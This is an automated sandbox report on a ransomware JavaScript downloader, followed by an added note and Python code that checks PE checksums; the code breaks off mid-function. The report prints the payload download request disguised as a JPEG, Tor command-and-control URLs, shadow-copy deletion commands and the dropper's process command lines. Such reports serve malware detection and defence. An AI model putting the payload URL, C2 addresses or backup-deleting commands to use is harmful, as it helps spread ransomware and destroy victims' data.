
Analysis Report 437#U0430.js

Overview

General Information

Joe Sandbox Version: 25.0.0 Tiger's Eye
Analysis ID: 108635
Start date: 06.02.2019
Start time: 12:38:46
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 47s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 437#U0430.js
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name: without instrumentation
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.troj.evad.winJS@8/4@12/4
EGA Information:
  • Successful, ratio: 75%
HDC Information:
  • Successful, ratio: 26.7% (good quality ratio 22.5%)
  • Quality average: 34.7%
  • Quality standard deviation: 27.7%
HCA Information: Failed
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .js
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Execution Graph export aborted for target wscript.exe, PID 4300 because there are no executed function
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Detection
Threshold | 100 | 0 - 100 | Report FP / FN | false | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts | Scripting 1 | Registry Run Keys / Start Folder 1 | Process Injection 1 1 1 | Masquerading 1 | Input Capture 1 | Process Discovery 2 | Application Deployment Software | Input Capture 1 | Data Encrypted 2 | Data Obfuscation 1
Replication Through Removable Media | Service Execution | Port Monitors | Accessibility Features | Software Packing 1 | Network Sniffing | Account Discovery 1 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol 1
Drive-by Compromise | Windows Management Instrumentation | Accessibility Features | Path Interception | Disabling Security Tools 1 1 | Input Capture | Security Software Discovery 4 1 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Non-Application Layer Protocol 3
Exploit Public-Facing Application | Scheduled Task | System Firmware | DLL Search Order Hijacking | Process Injection 1 1 1 | Credentials in Files | Remote System Discovery 1 | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol 2 3
Spearphishing Link | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Scripting 1 | Account Manipulation | System Network Configuration Discovery 1 | Shared Webroot | Data Staged | Scheduled Transfer | Connection Proxy 2
Spearphishing Attachment | Graphical User Interface | Modify Existing Service | New Service | File Deletion 1 | Brute Force | File and Directory Discovery 1 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port
Spearphishing via Service | Scripting | Path Interception | Scheduled Task | Obfuscated Files or Information 3 | Two-Factor Authentication Interception | System Information Discovery 3 3 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port

Signature Overview



AV Detection:

Antivirus detection for URL or domain
Source: http://a4ad4ip2xzclh6fd.onion/sys.phpn | Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\Windows\csrss.exe | virustotal: Detection: 22%
Source: C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmp | virustotal: Detection: 22%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G7QTC28F\messg[1].jpg | virustotal: Detection: 22%
Multi AV Scanner detection for submitted file
Source: 437#U0430.js | virustotal: Detection: 14%
Antivirus detection for unpacked file
Source: 4.2.radE040D.tmp.400000.0.unpack | Avira: Label: TR/Crypt.FKM.Gen
Source: 5.2.csrss.exe.2760000.2.unpack | Avira: Label: TR/Crypt.FKM.Gen
Source: 8.2.csrss.exe.2860000.2.unpack | Avira: Label: TR/Crypt.FKM.Gen
Source: 8.2.csrss.exe.400000.0.unpack | Avira: Label: TR/Crypt.FKM.Gen
Source: 4.2.radE040D.tmp.24b0000.2.unpack | Avira: Label: TR/Crypt.FKM.Gen
Source: 5.2.csrss.exe.400000.0.unpack | Avira: Label: TR/Crypt.FKM.Gen

Cryptography:

Public key (encryption) found
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: -----BEGIN PUBLIC KEY----- 4_2_0043D92E
Source: radE040D.tmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00416D6D _memset,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose
Contains functionality to query local drives
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00416AEC _memset,_memset,GetLogicalDriveStringsW,GetSystemDirectoryW,GetDriveTypeW,GetDriveTypeW

Networking:

Downloads files with wrong headers with respect to MIME Content-Type
Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Wed, 06 Feb 2019 11:39:40 GMT Server: Apache Last-Modified: Wed, 06 Feb 2019 11:05:06 GMT ETag: "17dec8-58137b2cf3f90" Accept-Ranges: bytes Content-Length: 1564360 Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 28 b8 5a 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 52 01 00 00 80 16 00 00 00 00 00 e0 59 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 20 00 00 02 00 00 3f 16 18 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
Found Tor onion address
Source: radE040D.tmp, 00000004.00000002.7965481625.0000000003690000.00000004.sdmp | String found in binary or memory: http://cryptsen7fo43rr6.onion/
Source: radE040D.tmp, 00000004.00000002.7983444516.00000000039D0000.00000004.sdmp | String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/sys.php
Source: radE040D.tmp, 00000004.00000002.7983444516.00000000039D0000.00000004.sdmp | String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/sys.phpn\\YN
May check the online IP address of the machine
Source: unknown | DNS query: name: whatismyipaddress.com
Source: unknown | DNS query: name: whatsmyip.net
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 194.109.206.212
Source: unknown | TCP traffic detected without corresponding DNS query: 208.83.223.34
Downloads executable code via HTTP
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Feb 2019 11:39:40 GMTServer: ApacheLast-Modified: Wed, 06 Feb 2019 11:05:06 GMTETag: "17dec8-58137b2cf3f90"Accept-Ranges: bytesContent-Length: 1564360Keep-Alive: timeout=2, max=100Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 28 b8 5a 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 52 01 00 00 80 16 00 00 00 00 00 e0 59 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 20 00 00 02 00 00 3f 16 18 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 194.109.206.212
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: DREAMHOST-AS-NewDreamNetworkLLCUS
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: GET /wp-content/themes/asteria-lite/css/messg.jpg HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: www.ri-photo.com Connection: Keep-Alive
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /wp-content/themes/asteria-lite/css/messg.jpg HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: www.ri-photo.com Connection: Keep-Alive
Found strings which match to known social media urls
Source: radE040D.tmp, 00000004.00000002.7898564154.000000000281B000.00000004.sdmp, csrss.exe, 00000005.00000002.6829010099.0000000002AEB000.00000004.sdmp, csrss.exe, 00000008.00000002.6849219741.0000000002CEB000.00000004.sdmp | String found in binary or memory: ww.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: radE040D.tmp, 00000004.00000002.7898564154.000000000281B000.00000004.sdmp | String found in binary or memory: ww.mit.edu,www.yahoo.com,www.slashdot.orgur equals www.yahoo.com (Yahoo)
Source: csrss.exe | String found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: radE040D.tmp, 00000004.00000003.7126538222.0000000003154000.00000004.sdmp, csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmp, csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmp | String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: radE040D.tmp, 00000004.00000002.7940768557.00000000030E0000.00000004.sdmp | String found in binary or memory: www.yahoo.comh equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: www.ri-photo.com
Urls found in memory or binary data
Source: radE040D.tmp, 00000004.00000002.7983444516.00000000039D0000.00000004.sdmp | String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/sys.php
Source: radE040D.tmp, 00000004.00000002.7983444516.00000000039D0000.00000004.sdmp | String found in binary or memory: http://a4ad4ip2xzclh6fd.onion/sys.phpn
Source: radE040D.tmp, 00000004.00000002.7743395847.00000000005E5000.00000040.sdmp, csrss.exe, 00000005.00000001.6684414722.00000000005E5000.00000040.sdmp, csrss.exe, 00000008.00000001.6776620077.00000000005E5000.00000040.sdmp | String found in binary or memory: http://a4ad4ip2xzclh6fd.onionreg.phpprog.phperr.phpcmd.phpsys.phpshd.phpmail.php?&v=b=i=k=ss=e=c=f=s
Source: radE040D.tmp, 00000004.00000002.7965481625.0000000003690000.00000004.sdmp | String found in binary or memory: http://cryptsen7fo43rr6.onion.cab/
Source: radE040D.tmp, 00000004.00000002.7965481625.0000000003690000.00000004.sdmp | String found in binary or memory: http://cryptsen7fo43rr6.onion.cab/plic
Source: radE040D.tmp, 00000004.00000002.7942486928.000000000310A000.00000004.sdmp | String found in binary or memory: http://cryptsen7fo43rr6.onion.cab/xmr
Source: radE040D.tmp, 00000004.00000002.7965481625.0000000003690000.00000004.sdmp | String found in binary or memory: http://cryptsen7fo43rr6.onion.to/
Source: radE040D.tmp, 00000004.00000002.7965481625.0000000003690000.00000004.sdmp | String found in binary or memory: http://cryptsen7fo43rr6.onion/
Source: radE040D.tmp, csrss.exe, 00000005.00000001.6684414722.00000000005E5000.00000040.sdmp, csrss.exe, 00000008.00000001.6776620077.00000000005E5000.00000040.sdmp | String found in binary or memory: http://whatismyipaddress.com/
Source: radE040D.tmp, 00000004.00000002.7743395847.00000000005E5000.00000040.sdmp, csrss.exe, 00000005.00000001.6684414722.00000000005E5000.00000040.sdmp, csrss.exe, 00000008.00000001.6776620077.00000000005E5000.00000040.sdmp | String found in binary or memory: http://whatismyipaddress.com///whatismyipaddress.com/ip/Click
Source: csrss.exe, 00000008.00000001.6776620077.00000000005E5000.00000040.sdmp | String found in binary or memory: http://whatsmyip.net/
Source: csrss.exe | String found in binary or memory: http://www.openssl.org/support/faq.html
Source: radE040D.tmp, 00000004.00000002.7685435280.0000000000400000.00000040.sdmp, csrss.exe, 00000005.00000001.6682682927.000000000056F000.00000040.sdmp, csrss.exe, 00000008.00000002.6842930052.0000000000400000.00000040.sdmp | String found in binary or memory: http://www.openssl.org/support/faq.html.
Source: wscript.exe, 00000000.00000003.6523724004.0000000005292000.00000004.sdmp, wscript.exe, 00000000.00000003.6481463686.0000000004D4E000.00000004.sdmp | String found in binary or memory: http://www.ri-photo.com/wp-content/themes/asteria-lite/css/messg.jpg
Source: wscript.exe, 00000000.00000003.6523724004.0000000005292000.00000004.sdmp | String found in binary or memory: http://www.ri-photo.com/wp-content/themes/asteria-lite/css/messg.jpg&v
Source: csrss.exe, csrss.exe, 00000008.00000002.6842930052.0000000000400000.00000040.sdmp | String found in binary or memory: https://www.torproject.org/
Source: radE040D.tmp, 00000004.00000002.7942486928.000000000310A000.00000004.sdmp | String found in binary or memory: https://www.torproject.org/download/download-easy.html.en
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 49817 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: csrss.exe, 00000005.00000002.6800250245.0000000000A00000.00000004.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to change the wallpaper
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_0040AC3A __EH_prolog,_memset,SystemParametersInfoW,SystemParametersInfoW
Deletes shadow drive data (may be related to ransomware)
Source: radE040D.tmp, 00000004.00000002.7743395847.00000000005E5000.00000040.sdmp | Binary or memory string: vssadmin.exediskshadow.exeList ShadowsDelete Shadows /All /QuietDELETE SHADOWS ALLrunas/s ROOT\CIMV2WQLAVAST
Source: csrss.exe, 00000005.00000001.6684414722.00000000005E5000.00000040.sdmp | Binary or memory string: vssadmin.exediskshadow.exeList ShadowsDelete Shadows /All /QuietDELETE SHADOWS ALLrunas/s ROOT\CIMV2WQLAVAST
Source: csrss.exe, 00000008.00000001.6776620077.00000000005E5000.00000040.sdmp | Binary or memory string: vssadmin.exediskshadow.exeList ShadowsDelete Shadows /All /QuietDELETE SHADOWS ALLrunas/s ROOT\CIMV2WQLAVAST

System Summary:

Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00417871 CreateFileW,DeviceIoControl,CloseHandle
Creates mutexes
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3232:120:WilError_01
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00416D6D
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_0041D211
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00413375
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00409519
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00405D99
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00417EB5
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_005700E0
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_0046216A
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00578217
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_004182F7
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_005702E0
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_0047C295
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00458591
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00578600
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00412699
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00572886
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00424930
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_0055CA56
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00448BF0
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_0040AC3A
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00412CBF
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_0055AD61
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00574D00
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00414D81
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00478E5B
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00572EF9
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00573180
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_004411B7
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00571230
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00575290
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00559480
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_005756D7
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_005716C0
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_005737C0
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_0041B9C0
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00571980
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_0054D9A0
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00407B25
Dropped file seen in connection with other malware
Source: Joe Sandbox View | Dropped File: C:\ProgramData\Windows\csrss.exe F8F4DE2F06C6C00B170ED88B4ED8D68DD01B48745F70FFCE38407B82AE05C0E7
Source: Joe Sandbox View | Dropped File: C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmp F8F4DE2F06C6C00B170ED88B4ED8D68DD01B48745F70FFCE38407B82AE05C0E7
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G7QTC28F\messg[1].jpg F8F4DE2F06C6C00B170ED88B4ED8D68DD01B48745F70FFCE38407B82AE05C0E7
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: String function: 005501C8 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: String function: 004427B6 appears 88 times
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: String function: 0040383F appears 83 times
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: String function: 0056F5DC appears 197 times
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: String function: 0055E5C0 appears 163 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: 437#U0430.js | Initial sample: Strings found which are bigger than 50
Reads the hosts file
Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wow64log.dll
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Section loaded: wow64log.dll
Source: C:\ProgramData\Windows\csrss.exe | Section loaded: wow64log.dll
Source: C:\ProgramData\Windows\csrss.exe | Section loaded: wow64log.dll
Classification label
Source: classification engine | Classification label: mal100.rans.troj.evad.winJS@8/4@12/4
Contains functionality to enum processes or threads
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,4_2_00449089
Creates files inside the user directory
Source: C:\Windows\SysWOW64\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G7QTC28F\messg[1].jpg
Creates temporary files
Source: C:\Windows\SysWOW64\wscript.exe | File created: C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmp
Reads ini files
Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Windows\SysWOW64\wscript.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: 437#U0430.js | virustotal: Detection: 14%
Sample might require command line arguments (.Net)
Source: csrss.exe | String found in binary or memory: 7300e4301afb0f11bd3e3bbb680dcd5a4f16132b src/or/tor_main.c babb5c60712b93b4aec373dbb16184bfa538c647 src/or/addressmap.c 1c2e8b3d7f6d19f4c3fecef13d8e29ea45d69028 src/or/buffers.c 52fbb8124bfb04bb83d44f1bbaaa2a1ebfa42870 src/or/channel.c 050ce52841624546a391
Source: csrss.exe | String found in binary or memory: ip-address
Source: csrss.exe | String found in binary or memory: dir-address
Source: csrss.exe | String found in binary or memory: or-address %s:%d
Source: csrss.exe | String found in binary or memory: or-address
Source: csrss.exe | String found in binary or memory: cp+(end-start_of_annotations) == router->cache_info.signed_descriptor_body+len
Source: csrss.exe | String found in binary or memory: id-cmc-addExtensions
Source: csrss.exe | String found in binary or memory: 68e src/or/addressmap.h fc122cd5462d0445cb668278744dd8778472cf54 src/or/buffers.h 03bcf0ecb460f7814ab484deb6f638f727704b94 src/or/channel.h 52340d597aa7c6cc5500f654f46733a4e577905a src/or/channeltls.h ff3a5693416ccf243f608a7bb943a078418c16d8 src/or/circpa
Source: csrss.exe | String found in binary or memory: accounting/interval-start
Source: csrss.exe | String found in binary or memory: .in-addr.arpa
Source: csrss.exe | String found in binary or memory: X-Your-Address-Is:
Source: csrss.exe | String found in binary or memory: X-Your-Address-Is: %s
Source: csrss.exe | String found in binary or memory: cffd2d9eef71f1ae5f7eb4e16aa56b728abe65aa src/common/address.h 3890e58a3754bc0de32e7cf38de8a790c2c282af src/common/backtrace.h 947ef902f15f556f176b1115f09d9966e377347d src/common/aes.h 2ad59cee80471c42536e66e24e73a8948e345dcf src/common/ciphers.inc ceaa37cf
Source: csrss.exe | String found in binary or memory: introduction-point %s ip-address %s onion-port %d onion-key %sservice-key %s
Source: csrss.exe | String found in binary or memory: %d.%d.%d.%d.in-addr.arpa
Source: csrss.exe | String found in binary or memory: --install
Source: csrss.exe | String found in binary or memory: -install
Source: csrss.exe | String found in binary or memory: set-addPolicy
Spawns processes
Source: unknown | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\437#U0430.js'
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmp
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\radE040D.tmp C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmp
Source: unknown | Process created: C:\ProgramData\Windows\csrss.exe 'C:\ProgramData\Windows\csrss.exe'
Source: unknown | Process created: C:\ProgramData\Windows\csrss.exe 'C:\ProgramData\Windows\csrss.exe'
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmp
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\radE040D.tmp C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmp
Uses an in-process (OLE) Automation server
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0041A13C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetP 4_2_0041A13C
PE file contains an invalid checksum
Source: radE040D.tmp.0.drStatic PE information: real checksum: 0x18163f should be: 0x181650
Source: messg[1].jpg.0.drStatic PE information: real checksum: 0x18163f should be: 0x181650
Source: csrss.exe.4.drStatic PE information: real checksum: 0x18163f should be: 0x181650
Note: all three dropped files show the identical pair of values, so messg[1].jpg (fetched into the IE cache by wscript.exe), radE040D.tmp (written to Temp) and C:\ProgramData\Windows\csrss.exe (written by radE040D.tmp) are copies of one PE. An invalid checksum by itself is weak evidence: Windows enforces the field only for kernel-mode drivers and a few boot-time images, and many unsigned builds never fill it in. What matters here is that the same mismatching pair travels under three different names.
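The check the report applied is cheap to reproduce. The following is an added example (mine, not part of the Joe Sandbox report or of the sample) that implements the PE CheckSum algorithm used by IMAGEHLP's CheckSumMappedFile, a 16-bit one's-complement sum over the file that skips the CheckSum dword and then adds the file length, and compares it with the value stored in the optional header. The small PE-shaped buffer it builds for the demonstration is constructed here and is not a loadable image; paths passed on the command line are read as real files.

```python
"""Recompute IMAGE_OPTIONAL_HEADER.CheckSum and compare it with the stored value.
Added example; not code from the report or the sample."""
import struct
import sys

PE_SIGNATURE = b"PE\0\0"


def checksum_field_offset(data: bytes) -> int:
    """File offset of OptionalHeader.CheckSum: e_lfanew (at 0x3C) -> 4-byte
    signature -> 20-byte IMAGE_FILE_HEADER -> optional header, where CheckSum
    sits at offset 0x40 for both PE32 and PE32+."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ header")
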